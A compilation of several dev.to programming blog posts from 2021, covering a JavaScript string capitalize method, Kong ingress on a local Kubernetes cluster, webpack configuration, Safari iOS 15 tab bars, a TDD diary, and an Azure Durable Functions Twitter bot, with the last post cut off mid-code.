- [Event Object](https://api.jquery.com/category/events/event-object/)
- [Inside Event Handling Function](https://learn.jquery.com/events/inside-event-handling-function/)

*by nasidulislam*

---

# String Prototype Capitalize

*Published 2021-06-22 · https://dev.to/dimasandhk/string-prototype-capitalize-5dhn · tags: javascript*

**Note: This article is intended for Indonesians**
# Introduction
JavaScript has many built-in functions on its prototypes: on arrays, strings, objects, and so on. One example is `String.prototype.toUpperCase()`, which lets us convert a string to uppercase.
## String.prototype.toUpperCase()
```javascript
const str = 'ini teks';
console.log(str.toUpperCase()) // => 'INI TEKS'
```
At some point, however, we may need to capitalize a string (uppercase only its first letter), and JavaScript has no built-in function for that. The solution is to write our own function, as in the following example:
## An Example Capitalize Function
```javascript
function capitalize(str) {
return `${str[0].toUpperCase()}${str.slice(1)}`
}
console.log(capitalize('ini teks')) // => 'Ini teks'
```
#### Explanation
`str[0].toUpperCase()` converts the first letter of the string to uppercase, and `str.slice(1)` returns the rest of the string starting from index 1.
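One caveat the snippet above glosses over: for an empty string, `str[0]` is `undefined`, so `capitalize('')` would throw a TypeError. A slightly more defensive variant (just one possible guard, not from the original article):

```javascript
// capitalize with a guard for empty or non-string input
function capitalize(str) {
  if (typeof str !== "string" || str.length === 0) {
    return str; // nothing to capitalize
  }
  return `${str[0].toUpperCase()}${str.slice(1)}`;
}

console.log(capitalize("ini teks")); // => 'Ini teks'
console.log(capitalize(""));         // => ''
```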
#### The Problem
This works well, but not quite the way we would like. The example above is an ordinary function, which can make our code harder to read once there are many functions. So how can we create a method that works like `.toUpperCase()`? Like this:
## String.prototype.capitalize()
```javascript
String.prototype.capitalize = function() {
return `${this[0].toUpperCase()}${this.slice(1)}`
}
console.log('ini teks'.capitalize()) // => 'Ini teks'
```
The body of the function is the same as in the previous example, but the code becomes tidier because we define it directly on the prototype, which makes `capitalize` feel like a built-in JavaScript function.
#### Explanation
Notice that something has changed, though: we now use the `this` keyword, because `this` in the code above refers to the string on which the `capitalize` method is called. For example:
```javascript
String.prototype.capitalize = function() {
return this
}
console.log('ini teks'.capitalize()) // => 'ini teks'
```
So `this` in the code above is used to capture the string, and for the same reason we cannot use an arrow function here: an arrow function does not get its own `this`, so it would not refer to the string (in strict mode it is `undefined`).
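This is easy to verify: with an arrow function, `this` does not refer to the string the method is called on. A small comparison (the name `capitalizeBroken` is just a throwaway for illustration):

```javascript
// Regular function: `this` is the string the method is called on
String.prototype.capitalize = function () {
  return `${this[0].toUpperCase()}${this.slice(1)}`;
};

// Arrow function: `this` is taken from the surrounding scope,
// so it is NOT the string and the result is useless
String.prototype.capitalizeBroken = () => this;

console.log("ini teks".capitalize());                      // => 'Ini teks'
console.log("ini teks".capitalizeBroken() === "ini teks"); // => false
```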
*by dimasandhk*

---

# Full Stack Kubernetes with Kong Ingress Controller

*Published 2021-06-28 · https://dev.to/mbogan/full-stack-kubernetes-with-kong-ingress-controller-hm3 · tags: kubernetes, devops, docker*

Kubernetes has become the name of the game when it comes to container orchestration. It allows teams to deploy and scale applications to meet changes in demand while providing a great developer experience.
The key to handling modern dynamic, scalable workloads in Kubernetes is a networking stack that can deliver API management, a service mesh and an ingress controller. [Kong Ingress Controller](https://github.com/Kong/kubernetes-ingress-controller) allows users to manage the routing rules that control external user access to the service in a Kubernetes cluster from the same platform.
This article will look at how you can use [Kong](https://konghq.com/?utm_source=guest&utm_medium=devspotlight&utm_campaign=community) for full-stack application deployments with Kubernetes. By full-stack, we mean Kong can handle:
* Containers
* Container networking
* Pod networking
* Service networking
* Host networking
* [Load balancing](https://dzone.com/articles/load-balancing-minecraft-servers-with-kong-gateway)
* [Rate limiting](https://konghq.com/blog/kong-gateway-rate-limiting/?utm_source=guest&utm_medium=devspotlight&utm_campaign=community)
* HTTPS redirects
Let's get started by creating our cluster.
## Installing Kind Kubernetes
With Kind, you can run local Kubernetes clusters using Docker. It was designed for testing Kubernetes but is perfect for local K8s development like we will do in this example. There are quite a few ways to install Kind, depending on your operating system. If you have a Mac, you can install it quickly with Homebrew:
```
brew install kind
```
If you are on a Windows machine and have Chocolatey installed, the command is just as simple:
```
choco install kind
```
If you have Go and Docker installed, you can run the following command to install Kind:
```
GO111MODULE="on" go get sigs.k8s.io/kind@v0.10.0
```
For more installation options, see the[ Kind quickstart](https://kind.sigs.k8s.io/docs/user/quick-start/).
Once Kind is installed, you need to create a cluster:
```
kind create cluster
```
After making the cluster, you can interact with it using kubectl. To list your clusters, run:
```
kind get clusters
```
It should return kind, the default cluster context name.
Now run the following to point kubectl to the kind cluster:
```
kind export kubeconfig
```
If you set up Kind correctly, running the following command will give you details about your cluster:
```
kubectl cluster-info
```

### Installing Kong Ingress Controller
Now that we have a cluster running, we can install Kong quickly by applying the manifest directly with the following command:
```
kubectl create -f https://bit.ly/k4k8s
```
Now run the following command to get details on kong-proxy:
```
kubectl -n kong get service kong-proxy
```
You will notice that the external IP is still pending. Kind only exposes the Kubernetes API endpoint, and so the service is not accessible outside of the cluster.

Since we are using Kind, we will have to run a port forward to do this. This command does not get daemonized, so you will have to open another console window to run other commands.
```
kubectl -n kong port-forward --address localhost,0.0.0.0 svc/kong-proxy 8080:80
```
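As an aside, these port forwards can be avoided entirely if the Kind cluster is created with port mappings up front. A sketch of such a cluster config (`kind-config.yaml` is an arbitrary file name; note that the ingress controller must additionally be configured to use host ports on that node, so see Kind's ingress guide for the full recipe):

```yaml
# kind-config.yaml: expose container ports 80/443 on the host at creation time
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
  - role: control-plane
    extraPortMappings:
      - containerPort: 80
        hostPort: 8080   # plain HTTP
      - containerPort: 443
        hostPort: 8443   # TLS
```

The cluster would then be created with `kind create cluster --config kind-config.yaml`.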
Next, we need to set an environment variable with the IP address from where we want to access Kong. This will be localhost since we are using a port forward.
```
export PROXY_IP=localhost:8080
```
You can curl the IP now or visit in a browser and should see:
```
{"message":"no Route matched with those values"}
```
## Deploying an Example App
Now let's deploy something that will return some results. Kubernetes has multiple example applications available in a [GitHub repo](https://github.com/kubernetes/examples). We are going to deploy the [Guestbook App](https://kubernetes.io/docs/tutorials/stateless-application/guestbook/) with these commands:
```
kubectl apply -f https://k8s.io/examples/application/guestbook/mongo-deployment.yaml
kubectl apply -f https://k8s.io/examples/application/guestbook/mongo-service.yaml
kubectl apply -f https://k8s.io/examples/application/guestbook/frontend-deployment.yaml
kubectl apply -f https://k8s.io/examples/application/guestbook/frontend-service.yaml
```
Now, if we run kubectl get services, we will see two new services:

We can also query the pods to make sure their status is ‘Running’:
```
kubectl get pods -l app.kubernetes.io/name=guestbook -l app.kubernetes.io/component=frontend
```

To test it, you can quickly run another port forward with:
```
kubectl port-forward svc/frontend 8000:80
```
You will find the guestbook running at [http://localhost:8000/](http://localhost:8000/). We will now set up the Kong Ingress Controller.
## Expose the App to the Internet
Now we can use the Kong Ingress Controller. To serve traffic, we need to set up an Ingress resource, creating a proxy for our application with the following command:
```
echo '
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: guestbook
annotations:
konghq.com/strip-path: "true"
kubernetes.io/ingress.class: kong
spec:
rules:
- http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: frontend
port:
number: 80
' | kubectl apply -f -
```
Now you will see the guestbook app at [http://localhost:8080/](http://localhost:8080/).
## Using Plugins as Services in Kong
With Kong Ingress, we can execute plugins at the service level. That way, Kong will execute a plugin whenever a request is sent to a specific service, no matter which ingress path it came from. If we want to add rate limits to our app, we can add the rate limiting plugin to our Kubernetes installation with the following command:
```
echo "
apiVersion: configuration.konghq.com/v1
kind: KongPlugin
metadata:
name: rl-by-ip
config:
minute: 5
limit_by: ip
policy: local
plugin: rate-limiting
" | kubectl apply -f -
kongplugin.configuration.konghq.com/rl-by-ip created
```
Once you install the plugin, you can apply the `konghq.com/plugins` annotation to our Guestbook service with the following command:
```
kubectl patch svc frontend \
-p '{"metadata":{"annotations":{"konghq.com/plugins": "rl-by-ip\n"}}}'
```
If you curl the guestbook app, you will see that rate limiting has been set up.

If you plan on testing the Guestbook frequently during this example, you may want to set the limit higher, or you will run into a Kong error that says the rate limit has been exceeded.
## Configuring an HTTPS Redirect
So far, the app is running on HTTP, and we want it to run on HTTPS. If we want to tell Kong to redirect all the HTTP requests, we can update its annotations to HTTPS and issue a 301 redirect with this command to patch the ingress entry:
```
kubectl patch ingress guestbook -p \
  '{"metadata":{"annotations":{"konghq.com/protocols":"https","konghq.com/https-redirect-status-code":"301"}}}'
```
To test this using kind, set up another port-forward with the following command:
```
kubectl -n kong port-forward --address localhost,0.0.0.0 svc/kong-proxy 8443:443
```
You can now access a "secure" version of the guestbook at [https://localhost:8443](https://localhost:8443/). It will not have a certificate, so you will run into warnings in your browser. Let's look at how we can add certificates.
## Adding the Cert-Manager
You can install the cert-manager with the following command:
```
kubectl apply -f \
  https://github.com/jetstack/cert-manager/releases/download/v1.3.1/cert-manager.yaml
```
Once the images pull down, you can verify that it is running with this command:
```
kubectl get all -n cert-manager
```
You should see something like this:

Since we have Kubernetes running locally with a port-forward, the IP address for the Kong proxy is 127.0.0.1. If you weren’t using a port forward, you could run the following command to find the IP address:
```
kubectl get -o jsonpath="{.status.loadBalancer.ingress[0].ip}" service -n kong kong-proxy
```
But since we are using a port forward, this command will return nothing. If this were in production, you would then set up DNS records to resolve your domain to the IP address you just retrieved. Once that is done, you can request a certificate from Let's Encrypt by running the following, making sure to change the email:
```
echo "apiVersion: cert-manager.io/v1alpha2
kind: ClusterIssuer
metadata:
name: letsencrypt-prod
namespace: cert-manager
spec:
acme:
email: user@example.com #change this email
privateKeySecretRef:
name: letsencrypt-prod
server: https://acme-v02.api.letsencrypt.org/directory
solvers:
- http01:
ingress:
class: kong" | kubectl apply -f -
```
Next, you will have to update your ingress resource to provide a certificate with the following command, changing the domain to your own:
```
echo '
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: guestbook-example-com
annotations:
kubernetes.io/tls-acme: "true"
cert-manager.io/cluster-issuer: letsencrypt-prod
kubernetes.io/ingress.class: kong
spec:
tls:
- secretName: guestbook-example-com
hosts:
- demo.example.com #change this domain/subdomain
rules:
- host: demo.example.com #change this domain/subdomain
http:
paths:
- path: /
pathType: Prefix
backend:
service:
            name: frontend
port:
number: 80
' | kubectl apply -f -
```
Once that is updated, cert-manager will start provisioning the certificate, and it should be ready shortly.
## Missing a Tool in Your K8s Stack?
Kong may be the missing tool in your Kubernetes stack. [Kong Ingress Controller](https://konghq.com/solutions/kubernetes-ingress/?utm_source=guest&utm_medium=devspotlight&utm_campaign=community) can implement authentication, HTTPS redirects, security certificates, and more across all your Kubernetes clusters. Using Kong, you can control your containers, networking, load balancing, rate limiting and more from one platform. It truly is the choice for full-stack ingress deployments.

*by mbogan*

---

# The one about TDD & the Ukulele - WEEK 2

*Published 2021-06-22 · https://dev.to/iqraraza/the-one-about-tdd-week-2-1j9j · tags: beginners, javascript, testing, codenewbie*
JEST was my new best friend and TDD my new enemy. It was natural to write code, THEN test it. Suddenly, I had to do it the other way round. There is method to the madness though.
Red, green, refactor... red, green, refactor... was all that was running through my hippocampus whilst washing dishes.
Mock functions and COVE (closed over variable environment) were the meal deal of the week.
Sounds complicated? It is! For me anyway. It's like setting a timer, waiting for it to go off, and then time's up.
The terminal was like my new home. I had become a lot more comfortable with pair programming and with making new friends in my cohort. I soon came to realise how important it is to communicate well and have good chemistry when pairing; that matters even more than the coding itself.
Everyone I partnered with was on the opposite side of the spectrum to me; however, they were all extremely kind and helpful. I was never made to feel inadequate or stupid.
So grateful.
One of my partners even played the ukulele during our short-lived pairing session. He set the bar too high!
*by iqraraza*

---

# Looking for a coding buddy

*Published 2021-06-23 · https://dev.to/programer171/looking-for-a-coding-buddy-1ndb · tags: java, html, css, python*

Hello everyone, my name is Programer171 (which is not real) and I am 13 years old. I love to code in Java, HTML and CSS, and I am currently learning Python. I am looking for someone around my age to code with me on projects. If you would like to be my coding buddy, please contact me: Programer171@gmail.com
Peace

*by programer171*

---

# Using Bottom Tab Bars on Safari iOS 15

*Published 2021-06-23 · https://samuelkraft.com/blog/safari-15-bottom-tab-bars-web · tags: tabbar, safari, ios, css*

**Apple recently announced the latest version of Safari on iOS 15 with a completely new design featuring a bottom floating tab bar. What does this mean for web developers and designers?**
Safari on iOS has long had a problem when it comes to building websites and web apps with bottom-aligned navigation, due to the browser toolbar's dynamic height. As you scroll, the toolbar disappears, making any element fixed to the bottom of the screen look great; but as soon as you try to tap any link inside it, the browser toolbar appears again.
{% youtube 5QVFKL11nh8 %}
This makes for a really poor UX, so designers and developers have mostly resorted to using "hamburger" menus instead. This is a shame, as bottom tab bars increase discoverability by not hiding links behind a tap and are also easier to reach one-handed on today's large mobile devices.
## Updates with Safari 15
The new Safari 15 now has a tab bar floating at the bottom of the screen. At first it might seem like this makes it even harder to create tab bar navigation, and by browsing the web on iOS 15 it's easy to spot issues like this:
{% youtube BcS7zV3RzM0 %}
## Fixing Tab Bar Overlap with Safe Areas
Thankfully, solving this issue is very easy using the `env()` CSS function together with `safe-area-inset-bottom`. This API shipped with iOS 11, making it possible to customize how websites render on devices with a notch. By inspecting Pinterest's code we can see that their tab bar has a fixed position anchored to the bottom; the relevant parts look something like this:
```css
.tabbar {
position: fixed;
bottom: 0;
}
```
To respect the safe area and make sure that nothing from the browser UI overlaps, let's add another bottom property with `env(safe-area-inset-bottom)` as the value. This function works like a CSS variable, returning the minimum amount of inset needed to keep your UI from overlapping with the browser's. We keep the old style rule as a fallback for browsers that do not support it:
```css
.tabbar {
position: fixed;
bottom: 0;
bottom: env(safe-area-inset-bottom);
}
```
Now when scrolling nothing overlaps:
{% youtube KKhn7JHtma0 %}
Be sure to use `env()` every time something is anchored to the bottom of the screen or overlap will likely appear. `env()` can also be combined with css `calc()` or `min()` and `max()`. You can learn more about this and respecting safe-area in [this excellent article](https://webkit.org/blog/7929/designing-websites-for-iphone-x/) published on the webkit blog.
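For instance, if a tab bar carries its own padding, `max()` avoids stacking that padding on top of the inset. A sketch (the class name and the 16px value are arbitrary):

```css
.tabbar {
  position: fixed;
  bottom: 0;
  /* Use whichever is larger: the bar's own padding or the device inset */
  padding-bottom: max(16px, env(safe-area-inset-bottom));
}
```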
The easiest way to test your websites is to download the Xcode 13 beta from [Apples developer portal](https://developer.apple.com/download/) and using an iOS 15 simulator by going to `Xcode > Open Developer Tool > Simulator`
## Tab Bar UX in iOS 15
Remember the issue in previous versions of Safari where you had to tap twice when using bottom tab bars? Once to show the Safari toolbar and again to actually trigger your link? That is no longer an issue 🙌. Safari 15 now respects and follows links and buttons right away, which is a big improvement! Check out how much better Twitter's tab bar works when switching tabs on Safari 15:
{% youtube PvkuL0n4Gqg %}
Even if tab bars now technically work better than before we still have to consider the design and UX to create something that people understand and that looks good. The browser UI is now very bottom-heavy and placing more actions next to it might feel cluttered. What do you think? Let me know on twitter [@samuelkraft](https://twitter.com/samuelkraft).
I'm excited to see how everyone adapts to the new UI and whether we will see a return of tab bars on the web. What do you think? Let me know on twitter [@samuelkraft](https://twitter.com/samuelkraft).

*by samuelkraft*

---

# 6 ways to configure Webpack

*Published 2021-06-23 · https://dev.to/typescripttv/6-ways-to-configure-webpack-5a33 · tags: javascript, typescript, webdev, beginners*
[Webpack](https://webpack.js.org/) is a build tool that makes code which was not primarily written for execution in browsers runnable in web browsers. With special plugins, webpack can manage many types of code, for example JavaScript, TypeScript, and Rust-generated WebAssembly.
There are webpack plugins to also compile, minify, shim, chunk, and bundle code. However, webpack was not designed to execute tasks such as linting, building, or testing your app. For this purpose, there are task runners such as [Grunt](https://gruntjs.com/), [Gulp](https://gulpjs.com/) or [npx](https://docs.npmjs.com/cli/v7/commands/npx).
In order to manage the functionality of webpack, it must be configured. Here are six different ways, in which webpack's configuration can be written.
## 1. Zero Config
As of webpack version 4, you are not required to specify a configuration. By default, webpack assumes that your code starts at `src/index.js` and will be bundled to `dist/main.js`. This is very convenient and promotes [convention over configuration](https://en.wikipedia.org/wiki/Convention_over_configuration) but it does not use webpack's full potential.
Without a configuration, webpack does not know whether code should be compressed for faster execution or bundled with source maps for better tracking of errors. Webpack expresses its confusion with the following warning:
> WARNING in configuration
>
> The 'mode' option has not been set, webpack will fallback to 'production' for this value.
>
> Set 'mode' option to 'development' or 'production' to enable defaults for each environment.
>
> You can also set it to 'none' to disable any default behavior. Learn more: https://webpack.js.org/configuration/mode/
Let's have a look at options to tell webpack how it should be configured.
## 2. Command Line Interface
To see all available commands and options to configure webpack from the command line interface, you can run `webpack --help`. This command will show you a list of arguments and how to use them. The following execution mimics the default (zero config) behaviour of webpack:
```bash
webpack --entry=./src/index.js --output-path=./dist --output-filename=main.js
```
As you can see, CLI configurations can become quite long. In order to minimize the writing effort, there is also a shorthand version of the above command:
```bash
webpack ./src/index.js -o ./dist
```
The simplified notation is at the expense of comprehensibility, which is why we will look at configuration files in the next step.
## 3. CommonJS Configuration File
Webpack can be instructed to read in a configuration file. By default, a file named `webpack.config.js` is being used. You can create it by using the `npx webpack init` command or by writing it yourself:
**webpack.config.js**
```js
const path = require("path");
const config = {
entry: "./src/index.js",
mode: "development",
module: {
rules: [
{
exclude: /(node_modules)/,
test: /\.(js|jsx)$/i,
loader: "babel-loader"
}
]
},
output: {
path: path.resolve(__dirname, "dist")
},
plugins: []
};
module.exports = config;
```
The configuration uses the CommonJS module syntax with `require` and `module.exports`. Make sure that your `package.json` does not define `"type": "module"`, otherwise you will receive the following error:
> [webpack-cli] ReferenceError: require is not defined
The configuration file should also be in the root of your project.
## 4. ESM Configuration File
If your `package.json` file specifies `"type": "module"` and you want to make use of ECMAScript modules, then you can also modernize your webpack configuration:
**webpack.config.js**
```js
import path from "path";
const config = {
entry: "./src/index.js",
mode: "development",
module: {
rules: [
{
exclude: /(node_modules)/,
test: /\.(js|jsx)$/i,
loader: "babel-loader"
}
]
},
output: {
path: path.resolve("./dist")
},
plugins: []
};
export default config;
```
## 5. TypeScript Configuration File
For those of you who like to work with TypeScript, webpack offers the possibility to use a configuration file written in TypeScript.
Webpack v5 already ships with TypeScript definitions, so you don't have to install [@types/webpack](https://www.npmjs.com/package/@types/webpack) but you need to install [typescript](https://www.npmjs.com/package/typescript), [ts-node](https://www.npmjs.com/package/ts-node) and [@types/node](https://www.npmjs.com/package/@types/node).
Because the extension `.ts` does not correspond to the standard `.js` extension, webpack has to be informed about this via the `--config` argument:
```bash
webpack --config webpack.config.ts
```
You also have to make sure that the test patterns of your "rules" and your "resolve" definitions include the TypeScript extension:
**webpack.config.ts**
```ts
import path from "path";
import { Configuration } from "webpack";
const config: Configuration = {
entry: "./src/index.js",
mode: "development",
module: {
rules: [
{
exclude: /(node_modules)/,
test: /\.[tj]sx?$/,
loader: "babel-loader"
}
]
},
output: {
path: path.resolve(__dirname, "./dist")
},
plugins: [],
resolve: {
extensions: [".js", ".jsx", ".ts", ".tsx"]
}
};
export default config;
```
☝️ Because the exemplary webpack configuration loads [Babel](https://babeljs.io/), we can still point to a JavaScript entry file as Babel makes it possible to use JavaScript and TypeScript code simultaneously.
⚠️ Please note that TypeScript configuration files cannot be used with ESM (see [ESM in webpack.config.ts isn't supported](https://github.com/webpack/webpack-cli/issues/2458)).
## 6. Node Interface
In addition to the execution via `webpack-cli`, webpack also supports a programmatic interface. This allows you to compile your frontend code on a Node.js server. Here is an example:
```ts
import express from "express";
import { webpack } from "webpack";
import webpackDevMiddleware from "webpack-dev-middleware";
import webpackHotMiddleware from "webpack-hot-middleware";
import webpackConfig, { webappDir } from "../webpack.config.js";

export function useWebpack(app: express.Express) {
  const webpackCompiler = webpack(webpackConfig);

  app.use(webpackDevMiddleware(webpackCompiler));
  app.use(webpackHotMiddleware(webpackCompiler));
  app.use(express.static(webappDir));
}
```
Instead of consuming your existing `webpack.config.js` file, you can also pass a configuration object to the `webpack` API.
## Get connected 🔗
Please [follow me on Twitter](https://twitter.com/bennycode) or [subscribe to my YouTube channel](https://www.youtube.com/c/typescripttv) if you liked this post. I would love to hear what you are building. 🙂 Best, Benny

*by bennycode*

---

# Say Hello to the Kyma Update Twitter Bot via Azure Durable Functions

*Published 2021-06-27 · https://dev.to/lechnerc77/say-hello-to-the-kyma-update-twitter-bot-by-azure-durable-functions-4e1a · tags: serverless, azure, kyma, durablefunctions*

## Motivation
As I would call myself a fan of _serverless_, and especially of _Azure Functions_ and their Durable extension, I am always looking for use cases to apply them to and learn something along the way.
Of course I follow the usual suspects in that area, like [Marc Duiker](https://dev.to/marcduiker), and his [blog post](https://blog.marcduiker.nl/2019/03/03/creating-azure-functions-updates-twitterbot.html) about his Twitter Bot made me curious.
As I am not a .NET programmer, I thought it might be a good chance to develop the same story with TypeScript-based Azure Functions, as there are always some "surprises" with Azure Functions when moving away from .NET 😉. In addition, I wanted to use a different pattern than Marc did, namely sub-orchestration.
Next, I needed a topic for the update notification. As my roots are in the SAP area, there is one favorite open source project of mine: [Kyma](https://kyma-project.io/), which is basically an opinionated stack for developing app extensions on Kubernetes.
So why not post update tweets about new releases published to the GitHub repository (and other related repositories)?
In this blog post I will guide you through the journey of developing this bot and highlight what I have learned along the way.
The code is available in [GitHub](https://github.com/lechnerc77/kyma-updates-twitter-bot).
## Process Flow - Requirements
The Twitter bot should have the following process flow:
- The process to check for updates should be triggered on a regular basis (e.g. every 6 hours)
- Based on a configuration that contains the repositories to be checked, a process must be started that executes the following steps for each repository:
- Get the latest release information from GitHub
- Check if a tweet was already sent out for the release. If this is not the case, create a status update on Twitter and store the information about the latest release.
The question is: how can we bring this process to life using Azure Functions, i.e. Durable Functions?
In general there are several options. In this blog post I will focus on how to solve it with a pattern called _sub-orchestration_ (see [official documentation](https://docs.microsoft.com/azure/azure-functions/durable/durable-functions-sub-orchestrations)).
## Solution Architecture
Projecting the process flow onto the solution space of Azure Functions and Durable Functions led me to the following architecture:
- The trigger for the process is a _timer-based Function_ that calls a Durable Orchestrator.
- The Durable Orchestrator contains two sequential steps:
- Call of an _Activity Function_ that fetches the configuration from an Azure Storage Table.
- For each entry in the configuration the orchestrator must fetch the current GitHub release, check if there was already a Tweet about it and react accordingly.
The second step in the Durable Orchestrator can be done via a [Fan-in/Fan-Out pattern](https://docs.microsoft.com/azure/azure-functions/durable/durable-functions-cloud-backup) or via a [sub-orchestration](https://docs.microsoft.com/azure/azure-functions/durable/durable-functions-sub-orchestrations).
I decided to use the latter, as it seemed quite natural to me to encapsulate the process steps in a dedicated orchestration as a self-contained building block.
So the second step in my main orchestrator is the call of a second orchestrator that comprises the following steps for each repository to check:
- Get the information from GitHub via an Activity Function.
- Get the information about the tweet history for the repository from a history table stored in another Azure Table via an Activity Function.
- Decide if an update is necessary. If this is the case trigger:
- an Activity Function to send the tweet.
- an Activity Function to update the History table.
In one picture this looks like this:

In order to store the API keys for the interaction with the Twitter API I used Azure Key Vault, which can be integrated with a Function App.
## Development Setup
I did all my development locally on a Windows machine making use of [Visual Studio Code](https://code.visualstudio.com/) and the [Azure Functions Extension](https://marketplace.visualstudio.com/items?itemName=ms-azuretools.vscode-azurefunctions).
As I use Durable Functions and store some configuration in Azure Tables I needed a Storage Emulator for the local development. I used [Azurite]( https://docs.microsoft.com/azure/storage/common/storage-use-azurite) for that and the [Storage Explorer](https://azure.microsoft.com/features/storage-explorer/) to have some insights.
Of course, do not forget to point the Functions to the emulator by setting the property `AzureWebJobsStorage` in the `local.settings.json` file to `UseDevelopmentStorage=true`.
Now let us walk through the single components of the solution and highlight some specifics that crossed my path along the way.
## Solution Components
### Azure Storage
Let's start with the persistency for the configuration and the history. For that I created two tables:
- one to store the configuration (`SourceRepositoryConfiguration`) i.e. which repositories to look at, what are the hashtags to be used etc.
- one to store the history of our updates (`RepositoryUpdateHistory`) i.e. what was the latest release that we tweeted about.
Here is how the configuration `SourceRepositoryConfiguration` looks like:

And here how an entry in the history table `RepositoryUpdateHistory` looks like:

With this in place, let's move on to the Azure Functions part of the story.
### Timer-based Function
The entry point to the Orchestration is a timer-based Function. The creation via the Azure Functions extension is straight-forward.
I adapted the `function.json` file to trigger every six hours, by setting the corresponding value:
```json
"schedule": "0 0 */6 * * *"
```
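For reference, Azure Functions timer triggers use six-field NCRONTAB expressions, which add a seconds field in front of the classic five cron fields:

```
{second} {minute} {hour} {day} {month} {day-of-week}
    0       0      */6    *      *         *
```

So `0 0 */6 * * *` fires at second 0 and minute 0 of every sixth hour, i.e. at 00:00, 06:00, 12:00 and 18:00.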
In addition, we need to make the Azure Function runtime aware that this Function can trigger an orchestration. To do so, we add the corresponding binding in the `function.json` file:
```json
{
"name": "starter",
"type": "orchestrationClient",
"direction": "in"
}
```
We must then adapt the code of the timer-based Function to call the main Orchestrator Function. The final code looks like this:
```javascript
import * as df from "durable-functions"
import { AzureFunction, Context } from "@azure/functions"
const timerTrigger: AzureFunction = async function (context: Context, myTimer: any): Promise<void> {
const client = df.getClient(context)
const instanceId = await client.startNew(process.env["MainOrchestratorName"], undefined, undefined)
context.log(`Started timer triggered orchestration with ID = '${instanceId}'.`)
}
export default timerTrigger
```
As you can see I did not hard-code the name of the main orchestrator that should be called, but provide it via an environment variable.
That's all to get the orchestration party started 🥳
> 💡 However, during local development I wanted to trigger the orchestration manually and therefore I also created an HTTP triggered Function, to be able to do so.
As a spoiler, I also deployed that Function to Azure, but I deactivated it. It serves me as a backup to trigger the process manually in production if I want or need to.
### The Main Orchestrator
As described in the architecture overview, I have one main Orchestrator Function that comprises two steps:
1. Call an Activity Function to retrieve the information which repositories to check (the `Config Reader` Activity Function)
2. For each repository that should be watched, schedule a sub-orchestration with the process steps containing the "business logic". The orchestrator gets the configuration data as input.
There is not too much code needed to achieve this: for each entry in the configuration a sub-orchestration is set up and then scheduled by the main orchestrator:
```javascript
const configuration = yield context.df.callActivity("KymaUpdateBotConfigReader")
if (configuration) {
const updateTasks = []
for (const configurationEntry of configuration) {
const child_id = context.df.instanceId + `:${configurationEntry.RowKey}`
const updateTask = context.df.callSubOrchestrator("KymaUpdateBotNewsUpdateOrchestrator", configurationEntry, child_id)
updateTasks.push(updateTask)
}
if (context.df.isReplaying === false) {
context.log.info(`Starting ${updateTasks.length} sub-orchestrations for update`)
}
yield context.df.Task.all(updateTasks)
}
```
> ⚠ There is one strange behavior that I encountered: the data fetched from the configuration has column names that start with a capital letter, as in the Azure Storage Table (e.g. __R__epositoryOwner). After transferring the object to the sub-orchestrator it seems that some JSON manipulation takes place and the names in the input parameter of the sub-orchestrator will start with a small letter (e.g. __r__epositoryOwner). This needs to be kept in mind, otherwise you will be surprised when you access the data later in the processing.
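If you want to guard against this, one option is to normalize the property names yourself before using them. A small helper sketch (the function name is mine, not from the repository):

```javascript
// Lowercase the first letter of every property name, so that both
// "RepositoryOwner" and "repositoryOwner" end up as "repositoryOwner".
const toCamelKeys = (obj) =>
  Object.fromEntries(
    Object.entries(obj).map(([key, value]) => [
      key.charAt(0).toLowerCase() + key.slice(1),
      value,
    ])
  )
```

With that, the sub-orchestrator can access the input consistently, no matter which casing survived the serialization round trip.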
### The Config Reader Activity Function
The reading of the configuration can be solved declaratively via _input binding_. For the sake of the later evaluation I only want to get the entries that are marked as `isActive` which can be achieved via a filter.
So the whole magic for this Function happens in the `function.json` file:
```json
{
"name": "repositoryConfiguration",
"type": "table",
"connection": "myStorageConnectionString",
"tableName": "SourceRepositoryConfiguration",
"partitionKey": "Repositories",
"filter": "(IsActive eq true)",
"direction": "in"
}
```
The Function itself returns the fetched data to the caller.
> ⚠ The official documentation for JavaScript Functions states that you must not use the `rowKey` and `partitionKey` parameters. However, they do work and I could not see any impact on the behavior. So I did not pass the partition key as an OData filter parameter and opened an issue on the documentation [https://github.com/MicrosoftDocs/azure-docs/issues/77103](https://github.com/MicrosoftDocs/azure-docs/issues/77103).
### The Sub-Orchestrator
As mentioned in the previous section the main process logic is orchestrated by the sub-orchestrator.
From the perspective of the Function Configuration it is another Azure Functions Orchestrator, so nothing special there.
The orchestrator executes the following steps:
1. Call an Activity Function to get the latest release from the GitHub repository (`GitHub Reader` Activity Function).
2. Call an Activity Function to retrieve the information about the last update that was executed by this Twitter bot stored in an Azure Storage table (`History Reader` Activity Function).
3. Check if a new release exists. If this is the case tweet an update about the new release (`Update Twitter Sender` Activity Function) and store the updated information into the history table (`History Update` Activity Function).
When you look at the code in the repository there is a bit more happening around, as I can influence the behavior of the orchestration to suppress sending tweets and to suppress the update of the table for the sake of testing and analysis options. Basically a lot of `if` clauses.
As things can go wrong when calling downstream systems, I call the Activity Functions with a _retry setup_ (`callActivityWithRetry`) to avoid immediate failures in case of hiccups in the downstream systems. The configuration parameters are injected via environment parameters from the Function App settings.
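As a sketch of what that injection can look like: `callActivityWithRetry` expects a retry configuration (first retry interval plus maximum number of attempts), and the values can be read from the app settings. The environment variable names below are assumptions for illustration, not the bot's actual setting names:

```javascript
// Build the retry configuration from environment variables.
// "RetryIntervalMs" and "MaxRetryAttempts" are hypothetical setting names;
// the defaults apply when the settings are absent.
const buildRetryConfig = (env) => ({
  firstRetryIntervalInMilliseconds: Number(env["RetryIntervalMs"] ?? 1000),
  maxNumberOfAttempts: Number(env["MaxRetryAttempts"] ?? 3),
})
```

In the orchestrator, such a configuration would then be passed to `callActivityWithRetry` alongside the activity name and its input.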
Let us now take a look at the single activities that are called throughout this orchestration.
### The GitHub Reader Activity Function
The setup for querying the GitHub repositories is done via the
[GitHub REST endpoints](https://docs.github.com/en/rest/overview/resources-in-the-rest-api).
As the number of calls is quite limited in my scenario, I use the publicly available endpoints so no authentication is needed. The restrictions that come along with respect to the number of calls per hour do not apply in my case, so I am fine with that.
For the sake of convenience I use the `@octokit/core` SDK that helps you a lot with interacting with the endpoints.
The logic for getting the data boils down to three lines of code:
```javascript
const octokit = new Octokit()
